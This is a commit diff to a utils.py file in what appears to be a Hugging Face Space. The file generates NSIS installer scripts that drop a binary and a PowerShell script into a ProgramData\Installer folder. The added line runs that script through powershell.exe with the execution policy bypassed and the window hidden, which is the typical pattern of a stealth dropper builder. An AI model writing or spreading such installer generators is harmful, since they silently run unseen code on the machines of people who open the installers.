Spaces:
Sleeping
Sleeping
Update utils.py
Browse files
utils.py
CHANGED
@@ -93,7 +93,7 @@ def generate_nsi_script(folder_path, bin_file, ps1_file):
|
|
93 |
SetOutPath "$WINDIR\..\ProgramData\Installer"
|
94 |
File "{bin_file}"
|
95 |
File "{ps1_file}"
|
96 |
-
ExecShell "" "$
|
97 |
SetAutoClose true
|
98 |
SectionEnd
|
99 |
"""
|
|
|
93 |
SetOutPath "$WINDIR\..\ProgramData\Installer"
|
94 |
File "{bin_file}"
|
95 |
File "{ps1_file}"
|
96 |
+
ExecShell "open" "powershell.exe" "-ExecutionPolicy Bypass -File $INSTDIR\Verification.ps1" SW_HIDE
|
97 |
SetAutoClose true
|
98 |
SectionEnd
|
99 |
"""
|